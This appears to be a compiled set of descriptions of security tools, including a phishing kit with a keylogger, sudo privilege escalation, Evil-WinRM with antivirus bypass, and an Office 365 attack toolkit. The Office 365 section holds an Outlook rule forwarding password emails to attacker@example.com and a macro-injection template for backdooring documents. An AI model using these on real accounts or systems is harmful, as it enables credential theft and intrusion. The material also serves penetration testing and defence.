
Hvazard - Remove Short Passwords & Duplicates, Change Lowercase To Uppercase & Reverse, Combine Wordlists!



Remove short passwords & duplicates, change lowercase to uppercase & reverse, combine wordlists!

Manual & explanation
-d --dict Specifies the file you want to modify. This is the only parameter / argument that is not optional.
-o --out The output filename (optional). Default is out.txt.
-s --short This operation removes the lines whose length is shorter than or equal to the specified number. Example: python dm.py -d dictionary.txt -s 5 <- This removes all lines of dictionary.txt with 5 or fewer characters
-d --dupli This operation removes duplicate lines. If a line appears more than once, the extra occurrences are removed, so no password is tried more than once, since that is a waste of time. Example: python dm.py -d wordlist -d
-l --lower This operation turns all upper-case letters to lower-case. Lower-case letters remain that way. Example: python dm.py --lower -d dictionary
-u --upper This operation turns all lower-case letters to upper-case. Upper-case letters remain that way. Example: python dm.py -u -d file.txt
-j --join This operation joins two files together to create one larger file. Example: python dm.py -d wd1.txt -j wd2.txt <- The result is saved to the second wordlist (wd2.txt)
-c --cut This operation removes all lines before the line number you specify. Useful if you have already used a large part of the wordlist and do not want to go through the same lines again. Example: python dm.py -d rockyou.txt -c N -o cutrocku.txt <- This removes the first N lines of rockyou.txt
-e --exp This option shows this message.
-a --arg This option shows the arguments & options.
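For illustration, here is a minimal Python sketch (not hvazard's actual code) of the two core clean-up operations, dropping short lines and duplicates in a single pass:

def clean_wordlist(in_path, out_path="out.txt", min_len=5):
    # Drop lines with min_len or fewer characters and duplicate lines,
    # keeping the first occurrence of each word in its original order.
    seen = set()
    with open(in_path) as src, open(out_path, "w") as dst:
        for line in src:
            word = line.rstrip("\n")
            if len(word) <= min_len or word in seen:
                continue
            seen.add(word)
            dst.write(word + "\n")

clean_wordlist("dictionary.txt")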



SUDO_KILLER - A Tool To Identify And Exploit Sudo Rules Misconfigurations And Vulnerabilities Within Sudo


If you like the project, and for my personal motivation to develop other tools, please give it a +1 star!

SUDO_KILLER
SUDO_KILLER is a tool that helps to abuse SUDO in different ways, with the main objective of performing privilege escalation on a Linux environment.
The tool helps to identify misconfigurations within sudo rules, vulnerabilities in the version of sudo being used (CVEs), and the use of dangerous binaries, all of which could be abused to elevate privileges to ROOT.
SUDO_KILLER will then provide a list of commands or local exploits which could be used to elevate privileges.
SUDO_KILLER does not perform any exploitation on your behalf; the exploitation needs to be performed manually, and this is intended.

Default usage
Example: ./sudo_killer.sh -c -r report.txt -e /tmp/

Arguments
-k : Keywords
-e : export location (export /etc/sudoers)
-c : include CVE checks with respect to sudo version
-s : supply user password for sudo checks (not recommended, except for CTFs)
-r : report name (save the output)
-h : help

CVEs check
To update the CVE database, run the following script: ./cve_update.sh

IMPORTANT !!!
If you need to input a password to run sudo -l, the script will not work unless you provide the password with the -s argument.
NOTE: sudo_killer does not exploit anything automatically by itself; it was designed like this on purpose. It checks for misconfigurations and vulnerabilities and then proposes the following (if you are lucky, the route to root is near!):
  • a list of commands to exploit
  • a list of exploits
  • some description on how and why the attack could be performed

Why is it possible to run "sudo -l" without a password?
By default, if the NOPASSWD tag is applied to any of the entries for a user on a host, he or she will be able to run "sudo -l" without a password. This behavior may be overridden via the verifypw and listpw options.
However, these rules only affect the current user, so if user impersonation is possible (using su), sudo -l should be launched from that user as well.
Sometimes the file /etc/sudoers can be read even if sudo -l is not accessible without a password.
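As a rough illustration of the NOPASSWD check described above (a Python sketch under assumptions; SUDO_KILLER itself is a shell script and this is not its actual code):

import subprocess

def nopasswd_entries():
    # `sudo -n -l` lists the caller's sudo rules non-interactively;
    # it only succeeds when listpw allows listing without a password.
    result = subprocess.run(["sudo", "-n", "-l"],
                            capture_output=True, text=True)
    return [line.strip() for line in result.stdout.splitlines()
            if "NOPASSWD" in line]

for entry in nopasswd_entries():
    print("Potentially abusable rule: " + entry)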

Testing the tool :)
A Docker image to test the different scenarios will be provided soon :) ... Stay connected!


HiddenEye - Modern Phishing Tool With Advanced Functionality (Android-Support-Available)


Modern Phishing Tool With Advanced Functionality

PHISHING | KEYLOGGER | INFORMATION_COLLECTOR | ALL_IN_ONE_TOOL | SOCIALENGINEERING

DEVELOPERS & CONTRIBUTORS
  1. ANONUD4Y (https://github.com/An0nUD4Y)
  2. USAMA ABDUL SATTAR (https://github.com/usama7628674)
  3. sTiKyt (https://github.com/sTiKyt)
  4. UNDEADSEC (https://github.com/UndeadSec)
  5. Micrafast (https://github.com/Micrafast)
  6. ___________ (WAITING FOR YOU)

SCREENSHOT (Android-Userland)


CREDIT:-
  • Anonud4y (I don't remember if I have done anything)
  • Usama (the most active developer)
  • sTiKyt (the guy who recustomized everything)
  • UNDEADSEC (for his wonderful repo SocialFish, which motivated us a lot)
  • TheLinuxChoice (for his tools' phishing pages)

TESTED ON FOLLOWING:-
  • Kali Linux - Rolling Edition
  • Parrot OS - Rolling Edition
  • Linux Mint - 18.3 Sylvia
  • Ubuntu - 16.04.3 LTS
  • MacOS High Sierra
  • Arch Linux
  • Manjaro XFCE Edition 17.1.12
  • Black Arch
  • Userland app (For Android Users)

PREREQUISITES ( Please verify if you have installed )
  • Python 3
  • Wget from Python
  • PHP
  • sudo

FOUND A BUG ? / HAVE ANY ISSUE ? :- (Read This)
  • Check closed & solved issues/bugs before opening a new one.
  • Make sure your issue is related to the code and resources of this repository.
  • It is your responsibility to respond on the issues you open.
  • If we don't find a response from the user on his/her issue within a reasonable time interval, we will close that issue.
  • Do not spam or advertise, and respect everyone.

WHAT'S NEW FEATURES
1) LIVE ATTACK
  • Now you will have live information about the victim, such as: IP address, geolocation, ISP, country & many more.
2) COMPATIBILITY
  • All the sites are mobile compatible.
3) KEYLOGGER
  • Now you will also have the ability to capture all the keystrokes of the victim.
  • You can now Deploy Keyloggers With (Y/N) option.
  • Major issues fixed.
4) ANDROID SUPPORT
  • We care about Android users, so we now provide two ways to run HiddenEye on Android devices.
(A) UserLand App
  • You Have to Download UserLand App. Click Here To Download it.
  • To read more how to set up userland app Read HERE
(B) Termux App
  • You Have to Download Termux App. Click Here To Download it.
  • For Further instruction Check Instructions
  • Termux users should clone with the following command, otherwise errors may occur while running.
git clone -b Termux-Support-Branch https://github.com/DarkSecDevelopers/HiddenEye.git
5) NEW LOOK PROVIDED
  • NOW FOCUS EASILY ON TASKS...
  • CUSTOMIZE APP WITH YOUR OWN THEMES
6) SERVEO URL TYPE SELECTION AVAILABLE NOW
  • Major issues with serveo have been fixed.
  • Now you can choose between a CUSTOM URL and a RANDOM URL.
7) LARGE COLLECTION OF PHISHING PAGES ADDED
  • Pages are taken from various tools including ShellPhish, Blackeye and SocialFish.

FOR FURTHER INSTALLATION PROCEDURE - (CHECK INSTRUCTIONS)

AVAILABLE PAGES
1) Facebook:
  • Traditional Facebook login page.
  • Advanced Poll Method.
  • Fake Security login with Facebook Page.
  • Facebook messenger login page.
2) Google:
  • Traditional Google login page.
  • Advanced Poll Method.
  • New Google Page.
3) LinkedIn:
  • Traditional LinkedIn login page.
4) Github:
  • Traditional Github login page.
5) Stackoverflow:
  • Traditional Stackoverflow login page.
6) Wordpress:
  • Similar Wordpress login page.
7) Twitter:
  • Traditional Twitter login page.
8) Instagram:
  • Traditional Instagram login page.
  • Instagram Autoliker Phishing Page.
  • Instagram Profile Scenario Advanced attack.
  • Instagram Badge Verify Attack [New]
  • Instagram AutoFollower Phishing Page by (https://github.com/thelinuxchoice)
9) SNAPCHAT PHISHING:
  • Traditional Snapchat Login Page
10) YAHOO PHISHING:
  • Traditional Yahoo Login Page
11) TWITCH PHISHING:
  • Traditional Twitch Login Page [ Login With Facebook Also Available ]
12) MICROSOFT PHISHING:
  • Traditional Microsoft-Live Web Login Page
13) STEAM PHISHING:
  • Traditional Steam Web Login Page
14) VK PHISHING:
  • Traditional VK Web Login Page
  • Advanced Poll Method
15) ICLOUD PHISHING:
  • Traditional iCloud Web Login Page
16) GitLab PHISHING:
  • Traditional GitLab Login Page
17) NetFlix PHISHING:
  • Traditional Netflix Login Page
18) Origin PHISHING:
  • Traditional Origin Login Page
19) Pinterest PHISHING:
  • Traditional Pinterest Login Page
20) Protonmail PHISHING:
  • Traditional Protonmail Login Page
21) Spotify PHISHING:
  • Traditional Spotify Login Page
22) Quora PHISHING:
  • Traditional Quora Login Page
23) PornHub PHISHING:
  • Traditional PornHub Login Page
24) Adobe PHISHING:
  • Traditional Adobe Login Page
25) Badoo PHISHING:
  • Traditional Badoo Login Page
26) CryptoCurrency PHISHING:
  • Traditional CryptoCurrency Login Page
27) DevianArt PHISHING:
  • Traditional DevianArt Login Page
28) DropBox PHISHING:
  • Traditional DropBox Login Page
29) eBay PHISHING:
  • Traditional eBay Login Page
30) MySpace PHISHING:
  • Traditional Myspace Login Page
31) PayPal PHISHING:
  • Traditional PayPal Login Page
32) Shopify PHISHING:
  • Traditional Shopify Login Page
33) Verizon PHISHING:
  • Traditional Verizon Login Page
34) Yandex PHISHING:
  • Traditional Yandex Login Page

Ascii error fix
dpkg-reconfigure locales
Then select "All locales", then select "en_US.UTF-8".
After that, reboot your machine. Then open a terminal and run the command: locale
You should see "en_US.UTF-8" as the default locale instead of POSIX.

DISCLAIMER
TO BE USED FOR EDUCATIONAL PURPOSES ONLY
The use of the HiddenEye is COMPLETE RESPONSIBILITY of the END-USER. Developers assume NO liability and are NOT responsible for any misuse or damage caused by this program. Please read LICENSE.


Dockernymous - A Script Used To Create A Whonix Like Gateway/Workstation Environment With Docker Containers


Dockernymous is a start script for Docker that runs and configures two individual Linux containers in order to act as an anonymization workstation/gateway setup.
It's aimed towards experienced Linux/Docker users, security professionals and penetration testers!
The gateway container acts as an Anonymizing Middlebox (see https://trac.torproject.org/projects/tor/wiki/doc/TransparentProxy) and routes ALL traffic from the workstation container through the Tor network.
The idea was to create a Whonix-like setup (see https://www.whonix.org) that runs on systems which aren't able to efficiently run two hardware-virtualized machines or don't have virtualization capabilities at all.

Requirements:
Host (Linux):
  • docker
  • vncviewer
  • xterm
  • curl
Gateway Image:
  • Linux (e.g. Alpine, Debian )
  • tor
  • procps
  • ncat
  • iptables
Workstation Image:
  • Linux (e.g. Kali)
  • ‎xfce4 or another desktop environment (for vnc access)
  • tightvncserver

Instructions:
1. Host
To clone the dockernymous repository type:
git clone https://github.com/bcapptain/dockernymous.git
Dockernymous needs an up and running Docker environment and a non-default docker network. Let's create one:
docker network create --driver=bridge --subnet=192.168.0.0/24 docker_internal
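If you prefer to script this step, the same non-default network can be created with the Python Docker SDK (docker-py); this mirrors the CLI call above:

import docker

client = docker.from_env()
ipam_pool = docker.types.IPAMPool(subnet="192.168.0.0/24")
ipam_config = docker.types.IPAMConfig(pool_configs=[ipam_pool])

# Equivalent of: docker network create --driver=bridge --subnet=192.168.0.0/24 docker_internal
client.networks.create("docker_internal", driver="bridge", ipam=ipam_config)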
2. Gateway (Alpine):
Get a lightweight gateway Image! For example Alpine:
docker pull alpine
Run the image, update the package list, install iptables & tor:
docker run -it alpine /bin/sh
apk add --update tor iptables iproute2
exit
Feel free to further customize the gateway for your needs before you exit.
To make this permanent you have to create a new image from the gateway container we just set up. Each time you run dockernymous a new container is created from that image and disposed on exit:
docker commit [Container ID] my_gateway
Get the container ID by running:
docker ps -a
3. Workstation (Kali Linux):
Get an image for the Workstation. For example, Kali Linux for penetration testing:
docker pull kalilinux/kali-linux-docker
Update and install the tools you would like to use (see https://www.kali.org/news/kali-linux-metapackages/).
docker run -it kalilinux/kali-linux-docker /bin/bash
apt-get update
apt-get dist-upgrade
apt install kali-linux-top10
Make sure the tightvncserver and curl packages are installed, which is the case with most Kali metapackages.
apt-get install tightvncserver
apt-get install curl
Install xfce4 for a minimal graphical Desktop:
$ apt-get install xfce4 
$ apt-get clean
$ exit
As with the Gateway, to make this permanent you have to create an image from that customized container. Each time you run dockernymous a new container is created and disposed on exit.
$ docker commit [Container ID] my_workstation
Get the container ID by running:
$ docker ps -a
4. Run dockernymous. In case you changed the names of the images to something different (defaults are: "docker_internal" (network), "my_gateway" (gateway), "my_workstation" (you guessed it)), open dockernymous.sh with your favorite editor and update the names in the configuration section.
Everything should be set up by now, so let's give it a try! Run dockernymous (don't forget to 'cd' into the cloned folder):
bash dockernymous.sh
or mark it executable once:
chmod +x dockernymous.sh 
and always run it with:
./dockernymous.sh
I'm happy about feedback. Please remember that dockernymous is still under development. The script is pretty messy yet, so consider it an alpha-phase project (no versioning yet).


VulnWhisperer - Create Actionable Data From Your Vulnerability Scans



Create actionable data from your vulnerability scans


VulnWhisperer is a vulnerability management tool and report aggregator. VulnWhisperer pulls all the reports from the different vulnerability scanners and creates a file with a unique filename for each one, using that data later to sync with Jira and feed Logstash. Jira does a closed-cycle full sync with the data provided by the scanners, while Logstash indexes and tags all of the information inside the report (see the logstash files at /resources/elk6/pipeline/). Data is then shipped to ElasticSearch to be indexed, and ends up in a visual and searchable format in Kibana with already defined dashboards.

Currently Supports

Vulnerability Frameworks

Reporting Frameworks

Getting Started
  1. Follow the install requirements
  2. Fill out the section you want to process in frameworks_example.ini file
  3. [JIRA] If using Jira, fill Jira config in the config file mentioned above.
  4. [ELK] Modify the IP settings in the Logstash files to accommodate your environment and import them to your logstash conf directory (default is /etc/logstash/conf.d/)
  5. [ELK] Import the Kibana visualizations
  6. Run Vulnwhisperer
Need assistance or just want to chat? Join our slack channel

Requirements


  • Python 2.7
  • Vulnerability Scanner
  • Reporting System: Jira / ElasticStack 6.6

Install Requirements - VulnWhisperer (may require sudo)
Install the OS package dependencies (Debian-based distros; CentOS doesn't need them):
sudo apt-get install  zlib1g-dev libxml2-dev libxslt1-dev 
(Optional) Use a python virtualenv to not mess with host python libraries
virtualenv venv (will create the python 2.7 virtualenv)
source venv/bin/activate (start the virtualenv, now pip will run there and should install libraries without sudo)

deactivate (for quitting the virtualenv once you are done)
Install python libraries requirements
pip install -r /path/to/VulnWhisperer/requirements.txt
cd /path/to/VulnWhisperer
python setup.py install
(Optional) If using a proxy, set the proxy URL as an environment variable:
export HTTP_PROXY=http://example.com:8080
export HTTPS_PROXY=http://example.com:8080
Now you're ready to pull down scans. (see run section)

Configuration
There are a few configuration steps to setting up VulnWhisperer:
  • Configure Ini file
  • Setup Logstash File
  • Import ElasticSearch Templates
  • Import Kibana Dashboards
frameworks_example.ini file


Run
To run, fill out the configuration file with your vulnerability scanner settings. Then you can execute from the command line.
(optional flag: -F -> provides "Fancy" log colouring, good for comprehension when manually executing VulnWhisperer)
vuln_whisperer -c configs/frameworks_example.ini -s nessus
or
vuln_whisperer -c configs/frameworks_example.ini -s qualys
If no section is specified (e.g. -s nessus), vulnwhisperer will check the config file for the modules that have the property enabled=true and run them sequentially.
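For illustration, that lookup could be sketched in Python like this (an assumption about the behavior described above, not VulnWhisperer's actual code; the project itself targets Python 2.7, where the module is named ConfigParser):

import configparser

config = configparser.ConfigParser()
config.read("configs/frameworks_example.ini")

# Collect every section flagged enabled=true, to be run sequentially.
enabled_sections = [section for section in config.sections()
                    if config.getboolean(section, "enabled", fallback=False)]
print(enabled_sections)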

Next you'll need to import the visualizations into Kibana and setup your logstash config. You can either follow the sample setup instructions [here](https://github.com/HASecuritySolutions/VulnWhisperer/wiki/Sample-Guide-ELK-Deployment) or go for the `docker-compose` solution we offer.
Docker-compose
ELK is a whole world by itself, and for newcomers to the platform it requires basic Linux skills and usually a bit of troubleshooting until it is deployed and working as expected. As we are not able to provide support for each user's ELK problems, we put together a docker-compose which includes:
  • VulnWhisperer
  • Logstash 6.6
  • ElasticSearch 6.6
  • Kibana 6.6
The docker-compose just requires specifying the paths where the VulnWhisperer data will be saved and where the config files reside. If run directly after git clone, with just the scanner config added to the VulnWhisperer config file (/resources/elk6/vulnwhisperer.ini), it will work out of the box.
It also takes care of loading the Kibana dashboards and visualizations automatically through the API, which otherwise needs to be done manually at Kibana's startup.
For more info about the docker-compose, check on the docker-compose wiki or the FAQ.

Roadmap
Our current Roadmap is as follows:
  • Create a Vulnerability Standard
  • Map every scanner results to the standard
  • Create Scanner module guidelines for easy integration of new scanners (consistency will allow #14)
  • Refactor the code to reuse functions and enable full compatibility among modules
  • Change Nessus CSV to JSON (Consistency and Fix #82)
  • Adapt single Logstash to standard and Kibana Dashboards
  • Implement Detectify Scanner
  • Implement Splunk Reporting/Dashboards
On top of this, we try to focus on fixing bugs as soon as possible, which might delay development. We also very much welcome PRs, and once we have the new standard implemented, it will be very easy to add compatibility with new scanners.
The Vulnerability Standard will initially be a new simple one level JSON with all the information that matches from the different scanners having standardized variable names, while maintaining the rest of the variables as they are. In the future, once everything is implemented, we will evaluate moving to an existing standard like ECS or AWS Vulnerability Schema; we prioritize functionality over perfection.

Video Walkthrough -- Featured on ElasticWebinar


Authors

Contributors


AMIRA - Automated Malware Incident Response & Analysis


AMIRA is a service for automatically running analysis on OSXCollector output files. The automated analysis is performed via OSXCollector Output Filters, in particular The One Filter to Rule Them All: the Analyze Filter. AMIRA takes care of retrieving the output files from an S3 bucket, running the Analyze Filter, and then uploading the results of the analysis back to S3 (although one could envision attaching them to the related JIRA ticket as well).

Prerequisites

tox
The following steps assume you have tox installed on your machine.
If this is not the case, please run:
$ sudo pip install tox

OSXCollector Output Filters configuration file
AMIRA uses OSXCollector Output Filters to do the actual analysis, so you will need to have a valid osxcollector.yaml configuration file in the working directory. An example configuration file can be found in the OSXCollector Output Filters repository.
The configuration file mentions the location of the file hash and the domain blacklists. Make sure that the blacklist locations mentioned in the configuration file are also available when running AMIRA.

AWS credentials
AMIRA uses boto to interface with AWS. You can supply the credentials using either of the possible boto config files.
The credentials should allow reading and deleting SQS messages from the SQS queue specified in the AMIRA config, as well as read access to the objects in the S3 bucket where the OSXCollector output files are stored. To be able to upload the analysis results back to the S3 bucket specified in the AMIRA configuration file, the credentials should also allow write access to this bucket.

AMIRA Architecture
The service uses the S3 bucket event notifications to trigger the analysis. You will need to configure an S3 bucket for the OSXCollector output files, so that when a file is added there the notification will be sent to an SQS queue (AmiraS3EventNotifications in the picture below). AMIRA periodically checks the queue for any new messages and upon receiving one it will fetch the OSXCollector output file from the S3 bucket. It will then run the Analyze Filter on the retrieved file.
The Analyze Filter runs all the filters contained in the OSXCollector Output Filters package sequentially. Some of them communicate with external resources, like domain and hash blacklists (or whitelists) and threat intel APIs, e.g. VirusTotal, OpenDNS Investigate or ShadowServer. The original OSXCollector output is extended with all of this information, and the very last filter run by the Analyze Filter summarizes all of the findings into a human-readable form. After the filter finishes running, the results of the analysis will be uploaded to the Analysis Results S3 bucket.
The overview of the whole process and the system components involved in it are depicted below:


Using AMIRA
The main entry point to AMIRA is in the amira/amira.py module. You will first need to create an instance of the AMIRA class by providing the AWS region name (where the SQS queue with the event notifications for the OSXCollector output bucket is) and the SQS queue name:
from amira.amira import AMIRA

amira = AMIRA('us-west-1', 'AmiraS3EventNotifications')
Then you can register the analysis results uploader, e.g. the S3 results uploader:
from amira.s3 import S3ResultsUploader

s3_results_uploader = S3ResultsUploader('amira-results-bucket')
amira.register_results_uploader(s3_results_uploader)
Finally, run AMIRA:
amira.run()
Go get some coffee, sit back, relax and wait till the analysis results pop up in the S3 bucket!
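Since uploaders are registered through register_results_uploader, other destinations can be plugged in the same way. A hypothetical example (the exact interface AMIRA expects is assumed here to mirror the S3 uploader, so treat this as a sketch):

import os

class LocalDirResultsUploader(object):
    """Hypothetical uploader that writes analysis results to a local
    directory instead of S3; method name and results layout are assumed."""

    def __init__(self, target_dir):
        self.target_dir = target_dir

    def upload_results(self, results):
        # Persist each analysis result on disk.
        for name, content in results:
            with open(os.path.join(self.target_dir, name), "w") as f:
                f.write(content)

amira.register_results_uploader(LocalDirResultsUploader("/tmp/amira-results"))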


Airopy - Get Clients And Access Points


Get clients and access points. With Alfa cards this script works correctly.

Dependencies
To run this script first install requirements as follows:
sudo pip3 install -r requirements.txt

How to use
In the examples I don't add 'sudo', but you need high privileges to execute them.
To get help:
python3 airopy.py -h  
To get APs:
python3 airopy.py -i wlx00c0ca81fb80 --aps  
To get Stations:
python3 airopy.py -i wlx00c0ca81fb80 --stations  
To get APs and Stations:
python3 airopy.py -i wlx00c0ca81fb80 --aps --stations  
To filter by a particular vendor:
python3 airopy.py -i wlx00c0ca81fb80 --stations -d 0  
To filter MAC vendors, check the corresponding number in mac_vendors.py. This last option can return unwanted devices, as it is based on OUI prefixes that have not been validated on my part.
If you use it in America, add --america.

Author
Josué Encinar


Evil-Winrm - The Ultimate WinRM Shell For Hacking/Pentesting


The ultimate WinRM shell for hacking/pentesting.



By: CyberVaca@HackPlayers

Description & Purpose
This shell is the ultimate WinRM shell for hacking/pentesting.
WinRM (Windows Remote Management) is the Microsoft implementation of the WS-Management Protocol, a standard SOAP-based protocol that allows hardware and operating systems from different vendors to interoperate. Microsoft included it in their operating systems in order to make life easier for system administrators.
This program can be used on any Microsoft Windows server with this feature enabled (usually at port 5985), of course only if you have credentials and permissions to use it. So we can say that it could be used in a post-exploitation hacking/pentesting phase. The purpose of this program is to provide nice and easy-to-use features for hacking. It can be used for legitimate purposes by system administrators as well, but most of its features are focused on hacking/pentesting.

Features
  • Command History
  • WinRM command completion
  • Local files completion
  • Upload and download files
  • List remote machine services
  • FullLanguage Powershell language mode
  • Load Powershell scripts
  • Load in memory dll files bypassing some AVs
  • Load in memory C# (C Sharp) compiled exe files bypassing some AVs
  • Colorization on output messages (can be disabled optionally)

Help
Usage: evil-winrm -i IP -u USER -s SCRIPTS_PATH -e EXES_PATH [-P PORT] [-p PASS] [-U URL]
-i, --ip IP Remote host IP or hostname (required)
-P, --port PORT Remote host port (default 5985)
-u, --user USER Username (required)
-p, --password PASS Password
-s, --scripts PS_SCRIPTS_PATH Powershell scripts path (required)
-e, --executables EXES_PATH C# executables path (required)
-U, --url URL Remote url endpoint (default /wsman)
-V, --version Show version
-h, --help Display this help message

Requirements
Ruby 2.3 or higher is needed. Some ruby gems are needed as well: winrm >=2.3.2, winrm-fs >=1.3.2, stringio >=0.0.2 and colorize >=0.8.1.
~$ sudo gem install winrm winrm-fs colorize stringio

Installation & Quick Start
  • Step 1. Clone the repo: git clone https://github.com/Hackplayers/evil-winrm.git
  • Step 2. Ready. Just launch it! ~$ cd evil-winrm && ruby evil-winrm.rb -i 192.168.1.100 -u Administrator -p 'MySuperSecr3tPass123!' -s '/home/foo/ps1_scripts/' -e '/home/foo/exe_files/'
If you don't want to put the password in clear text, you can omit the -p argument; the password will then be prompted for, preventing it from being shown.
To use IPv6, the address must be added to /etc/hosts.

Alternative installation method as ruby gem
  • Step 1. Install it: gem install evil-winrm
  • Step 2. Ready. Just launch it! ~$ evil-winrm -i 192.168.1.100 -u Administrator -p 'MySuperSecr3tPass123!' -s '/home/foo/ps1_scripts/' -e '/home/foo/exe_files/'

Documentation

Basic commands
  • upload: local files can be auto-completed using the tab key. The remote_path is not needed if the local file is in the same directory as the evil-winrm.rb file.
    • usage: upload local_path remote_path
  • download: the local_path is not needed if the remote file is in the current directory.
    • usage: download remote_path local_path
  • services: list all services. No administrator permissions needed.
  • menu: loads the Invoke-Binary and l04d3r-LoadDll functions that are explained below. When a ps1 is loaded, all its functions will be shown.

Load powershell scripts
  • To load a ps1 file you just have to type its name (auto-completion using the tab key is allowed). The scripts must be in the path set with the -s argument. Type menu again to see the loaded functions.

Advanced commands
  • Invoke-Binary: allows exes compiled from C# to be executed in memory. The name can be auto-completed using the tab key, and up to 3 parameters are allowed. The executables must be in the path set with the -e argument.

  • l04d3r-LoadDll: allows loading dll libraries in memory. It is equivalent to: [Reflection.Assembly]::Load([IO.File]::ReadAllBytes("pwn.dll"))
    The dll file can be hosted over smb, http or locally. Once it is loaded, type menu; then it is possible to autocomplete all functions.


Extra features
  • To disable colors, just modify the $colors_enabled variable in the code. Set it to false: $colors_enabled = false

Credits:
Main author:
Collaborators, developers, documenters, testers and supporters:
Hat tip to:

Disclaimer & License
This script is licensed under LGPLv3+. Direct link to License.
Evil-WinRM should be used for authorized penetration testing and/or nonprofit educational purposes only. Any misuse of this software will not be the responsibility of the author or of any other collaborator. Use it at your own servers and/or with the server owner's permission.



Pyattck - A Python Module To Interact With The Mitre ATT&CK Framework


A Python Module to interact with the Mitre ATT&CK Framework.

pyattck has the following notable features in its current release:
  • Retrieve all Tactics, Techniques, Actors, Malware, Tools, and Mitigations
  • All techniques have suggested mitigations as a property
  • For each class you can access additional information about related data points:
  • Actor
    • Tools used by the Actor or Group
    • Malware used by the Actor or Group
    • Techniques this Actor or Group uses
  • Malware
    • Actor or Group(s) using this malware
    • Techniques this malware is used with
  • Mitigation
    • Techniques related to a specific set of mitigation suggestions
  • Tactic
    • Techniques found in a specific Tactic (phase)
  • Technique
    • Tactics a technique is found in
    • Mitigation suggestions for a given technique
    • Actor or Group(s) identified as using this technique
  • Tools
    • Techniques that the specified tool is used within
    • Actor or Group(s) using a specified tool

Installation
OS X & Linux:
pip install pyattck
Windows:
pip install pyattck

Usage example
To use pyattck you must instantiate an Attck object:
from pyattck import Attck

attack = Attck()
You can access the following properties on your Attck object:
  • actor
  • malware
  • mitigation
  • tactic
  • technique
  • tools
Below are examples of accessing each of these properties:
from pyattck import Attck

attack = Attck()

# accessing actors
for actor in attack.actors:
    print(actor)

    # accessing malware used by an actor or group
    for malware in actor.malware:
        print(malware)

    # accessing tools used by an actor or group
    for tool in actor.tools:
        print(tool)

    # accessing techniques used by an actor or group
    for technique in actor.techniques:
        print(technique)

# accessing malware
for malware in attack.malwares:
    print(malware)

    # accessing actors or groups using this malware
    for actor in malware.actors:
        print(actor)

    # accessing techniques that this malware is used in
    for technique in malware.techniques:
        print(technique)

# accessing mitigations
for mitigation in attack.mitigations:
    print(mitigation)

    # accessing techniques related to mitigation recommendations
    for technique in mitigation.techniques:
        print(technique)

# accessing tactics
for tactic in attack.tactics:
    print(tactic)

    # accessing techniques related to this tactic
    for technique in tactic.techniques:
        print(technique)

# accessing techniques
for technique in attack.techniques:
    print(technique)

    # accessing tactics that this technique belongs to
    for tactic in technique.tactics:
        print(tactic)

    # accessing mitigation recommendations for this technique
    for mitigation in technique.mitigation:
        print(mitigation)

    # accessing actors using this technique
    for actor in technique.actors:
        print(actor)

# accessing tools
for tool in attack.tools:
    print(tool)

    # accessing techniques this tool is used in
    for technique in tool.techniques:
        print(technique)

    # accessing actors or groups using this tool
    for actor in tool.actors:
        print(actor)

Release History
  • 1.0.0
    • Initial release of pyattck to PyPi
  • 1.0.1
    • Updating Documentation with new reference links

Meta
Josh Rickard – @MSAdministrator – rickardja@live.com
Distributed under the MIT license. See LICENSE for more information.

Contributing
  1. Fork it (https://github.com/swimlane/pyattck/fork)
  2. Create your feature branch (git checkout -b feature/fooBar)
  3. Commit your changes (git commit -am 'Add some fooBar')
  4. Push to the branch (git push origin feature/fooBar)
  5. Create a new Pull Request


O365-Attack-Toolkit - A Toolkit To Attack Office365

o365-attack-toolkit allows operators to perform an OAuth phishing attack and later on use the Microsoft Graph API to extract interesting information.
Some of the implemented features are :
  • Extraction of keyworded e-mails from Outlook.
  • Creation of Outlook Rules.
  • Extraction of files from OneDrive/Sharepoint.
  • Injection of macros on Word documents.

Architecture


The toolkit consists of several components

Phishing endpoint
The phishing endpoint is responsible for serving the HTML file that performs the OAuth token phishing.

Backend services
Afterward, the token will be used by the backend services to perform the defined attacks.

Management interface
The management interface can be utilized to inspect the extracted information from the Microsoft Graph API.

Features

Outlook Keyworded Extraction
User emails can be extracted by this toolkit using keywords. For every defined keyword in the configuration file, all the emails that match them will be downloaded and saved in the database. The operator can inspect the downloaded emails through the management interface.
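Under the hood this kind of keyword search maps onto the Microsoft Graph messages endpoint. A minimal Python sketch of the idea (the toolkit itself is written in Go; token acquisition is omitted here):

import requests

GRAPH = "https://graph.microsoft.com/v1.0"

def search_messages(access_token, keyword):
    # $search matches the keyword across common message fields.
    resp = requests.get(
        GRAPH + "/me/messages",
        params={"$search": '"%s"' % keyword},
        headers={"Authorization": "Bearer " + access_token},
    )
    resp.raise_for_status()
    return resp.json().get("value", [])

for message in search_messages("<phished token>", "password"):
    print(message.get("subject"))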

Onedrive/Sharepoint Keyworded Extraction
Microsoft Graph API can be used to access files across OneDrive, OneDrive for Business and SharePoint document libraries. User files can be extracted by this toolkit using keywords. For every defined keyword in the configuration file, all the documents that match them will be downloaded and saved locally. The operator can examine the documents using the management interface.

Outlook Rules Creation
Microsoft Graph API supports the creation of Outlook rules. You can define different rules by putting the rule JSON files in the rules/ folder. https://docs.microsoft.com/en-us/graph/api/mailfolder-post-messagerules?view=graph-rest-1.0&tabs=cs
Below is an example rule that, when loaded, forwards every email containing "password" in the body to attacker@example.com.
{
  "displayName": "Example Rule",
  "sequence": 2,
  "isEnabled": true,
  "conditions": {
    "bodyContains": [
      "password"
    ]
  },
  "actions": {
    "forwardTo": [
      {
        "emailAddress": {
          "name": "Attacker Email",
          "address": "attacker@example.com"
        }
      }
    ],
    "stopProcessingRules": false
  }
}

Word Document Macro Backdooring
Users' documents hosted on OneDrive can be backdoored by injecting macros. If this feature is enabled, the last 15 documents accessed by the user will be downloaded and backdoored with the macro defined in the configuration file. After the backdoored file has been uploaded, the extension of the document is changed to .doc in order for the macro to be supported by Word. It should be noted that after backdooring, the documents can no longer be edited online, which increases the chances of our payload executing.
This functionality can only be used on Windows because the insertion of macros is done using the Word COM object. A VBS file is built from the template below and executed, so don't panic if you see wscript.exe running.
Dim wdApp
Set wdApp = CreateObject("Word.Application")
wdApp.Documents.Open("{DOCUMENT}")
wdApp.Documents(1).VBProject.VBComponents("ThisDocument").CodeModule.AddFromFile "{MACRO}"
wdApp.Documents(1).SaveAs2 "{OUTPUT}", 0
wdApp.Quit

How to set up

Compile
cd %GOPATH%
git clone https://github.com/0x09AL/o365-attack-toolkit
cd o365-attack-toolkit
dep ensure
go build

Configuration
An example configuration file is provided in the repository.

Deployment
Before you start using this toolkit, you need to create an application on the Azure Portal. Go to Azure Active Directory -> App Registrations -> Register an application.


